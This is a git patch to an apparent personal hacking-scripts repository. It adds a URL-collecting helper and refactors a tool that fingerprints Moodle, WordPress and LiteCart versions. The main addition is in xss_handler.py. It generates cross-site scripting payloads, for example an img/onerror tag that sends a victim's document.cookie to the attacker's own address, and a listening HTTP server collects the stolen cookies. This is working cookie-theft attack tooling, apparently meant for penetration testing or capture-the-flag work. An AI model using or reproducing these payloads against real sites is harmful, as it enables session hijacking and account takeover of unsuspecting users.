From a086ddeb42b1fa068a1b4b0b21d6c5520372c6b6 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Tue, 22 Sep 2020 20:55:06 +0200 Subject: [PATCH] Some more xss payloads --- util.py | 40 ++++++++++++++++++++++++++++++++++++++++ web_service_finder.py | 20 ++++---------------- xss_handler.py | 25 +++++++++++++++++++++---- 3 files changed, 65 insertions(+), 20 deletions(-) mode change 100644 => 100755 util.py diff --git a/util.py b/util.py old mode 100644 new mode 100755 index eb1bd63..f201d25 --- a/util.py +++ b/util.py @@ -1,9 +1,14 @@ +#!/usr/bin/env python + import random import socket import netifaces as ni +import requests import sys import exif import PIL +import os +from bs4 import BeautifulSoup def getAddress(interface="tun0"): if not interface in ni.interfaces(): @@ -135,6 +140,22 @@ def exifImage(payload="", _in=None, _out=None, exif_t else: print("Invalid output argument.") +def collectUrls(input): + if not isinstance(input, BeautifulSoup): + input = BeautifulSoup(input, "html.parser") + + urls = set() + attrs = ["src","href"] + tags = ["a","link","script","img"] + + for tag in tags: + for e in input.find_all(tag): + for attr in attrs: + if e.has_attr(attr): + urls.add(e[attr]) + + return urls + if __name__ == "__main__": bin = sys.argv[0] if len(sys.argv) < 2: @@ -172,3 +193,22 @@ if __name__ == "__main__": _out = ".".join(_out[0:-1]) + "_exif." + _out[-1] exifImage(payload, _in, _out, tag) + elif command == "collectUrls": + if len(sys.argv) < 3: + print("Usage: %s collectUrls " % bin) + else: + uri = sys.argv[2] + if os.path.isfile(uri): + data = open(uri,"r").read() + else: + res = requests.get(uri) + if res.status_code != 200: + print("%s returned: %d %s" % (uri, res.status_code, res.reason)) + exit() + data = res.text + for item in sorted(collectUrls(data)): + print(item) + elif command == "help": + print("Usage: %s [command]" % bin) + print("Available commands:") + print(" help, getAddress, pad, collectUrls, exifImage") diff --git a/web_service_finder.py b/web_service_finder.py index c21288c..18d5b3c 100644 --- a/web_service_finder.py +++ b/web_service_finder.py @@ -5,6 +5,7 @@ import sys import argparse import requests import urllib.parse +from hackingscripts import util from bs4 import BeautifulSoup class WebServicecFinder: @@ -108,19 +109,6 @@ class WebServicecFinder: return True return False - def collectUrls(self, soup): - urls = set() - attrs = ["src","href"] - tags = ["a","link","script","img"] - - for tag in tags: - for e in soup.find_all(tag): - for attr in attrs: - if e.has_attr(attr): - urls.add(e[attr]) - - return urls - def retrieveMoodleVersion(self, v): res = requests.get("https://docs.moodle.org/dev/Releases") soup = BeautifulSoup(res.text, "html.parser") @@ -158,9 +146,9 @@ class WebServicecFinder: moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)") moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/") litecart_pattern = re.compile(r"^https://www.litecart.net") - wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|block-library/style.min.css)\?ver=([0-9.]+)(&|$)") + wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)") - urls = self.collectUrls(soup) + urls = util.collectUrls(soup) for url in urls: self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) @@ -170,7 +158,7 @@ class WebServicecFinder: def analyseRobots(self): res = self.do_get("/robots.txt", allow_redirects=False) - if res.status_code in (301,302,404,403): + if res.status_code != 200: print("[-] robots.txt not found or inaccessible") return False diff --git a/xss_handler.py b/xss_handler.py index 09e569f..b8afdc8 100755 --- a/xss_handler.py +++ b/xss_handler.py @@ -6,12 +6,29 @@ import http.server import socketserver from http.server import HTTPServer, BaseHTTPRequestHandler -def generatePayload(type, address, port): - if type == "img": - return '' % (address, port) +def getCookieAddress(address, port): + if port == 80: + return "'http://%s/?x='+document.cookie" % address else: + return "'http://%s:%d/?x='+document.cookie" % (address, port) + +def generatePayload(type, address, port): + + payloads = [] + cookieAddress = getCookieAddress(address, port) + + media_tags = ["img","audio","video","image","body","script","object"] + if type in media_tags: + payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress)) + + if type == "script": + payloads.append('' % cookieAddress) + + if len(payloads) == 0: return None + return "\n".join(payloads) + class XssServer(BaseHTTPRequestHandler): def _set_headers(self): self.send_response(200) @@ -54,7 +71,7 @@ if __name__ == "__main__": payload = generatePayload(payload_type, local_address, listen_port) if not payload: - print("Unsupported payload type, choose one of: img") + print("Unsupported payload type") exit(1) print("Payload:")